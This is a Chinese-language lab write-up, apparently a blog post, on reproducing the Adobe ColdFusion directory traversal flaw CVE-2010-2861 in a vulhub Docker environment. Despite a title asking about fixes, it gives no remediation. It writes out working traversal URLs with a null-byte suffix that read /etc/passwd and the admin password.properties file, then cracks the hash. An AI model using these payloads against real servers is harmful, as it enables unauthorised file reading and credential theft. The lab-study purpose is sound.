CVE-2010-2861漏洞的详细修复措施是什么？

本文共计519个文字，预计阅读时间需要3分钟。

Adobe ColdFusion 文件读取漏洞（CVE-2010-2861）复现、实验环境

Adobe ColdFusion 是美国 Adobe 公司的一款动态 Web 服务器产品，其运行 CFML（ColdFusion Markup Language）语言。本文将介绍 CVE-2010-2861 漏洞的复现过程。

实验环境：

1.操作系统：Ubuntu 20.04

2.漏洞利用：vulhub/coldfusion/CVE-2010-2861

3.漏洞介绍：Adobe ColdFusion 文件读取漏洞

复现步骤：

1.克隆 vulhub 仓库到本地：

git clone https://github.com/vulhub/vulhub.git

2.进入 coldfusion/CVE-2010-2861 目录：

cd vulhub/coldfusion/CVE-2010-2861

3.启动漏洞环境：

docker-compose up -d

4.查看漏洞复现指南：

cat README.md 按照指南进行漏洞复现。

Adobe ColdFusion 文件读取漏洞（CVE-2010-2861）复现 一、实验所需环境 1、Ubuntu 2、vulhub 3、coldfusion/CVE-2010-2861 二、漏洞介绍

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞，可导致未授权的用户读取服务器任意文件。

三、漏洞复现

（1）进入vulhub，选择coldfusion/CVE-2010-2861漏洞环境，
输入命令启动：docker-compose up -d

（2）环境启动可能需要1~5分钟，启动后，访问your-ip:8500/CFIDE/administrator/enter.cfm，可以看到初始化页面，输入密码admin，开始初始化整个环境。


（3）使用Burp Suite抓包，直接访问your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en，即可读取文件/etc/passwd：


（4）读取后台管理员密码your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en：


（5）将密文复制到解密网站进行解密，解密后获取文明密码为：admin

参考链接：

• github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2010-2861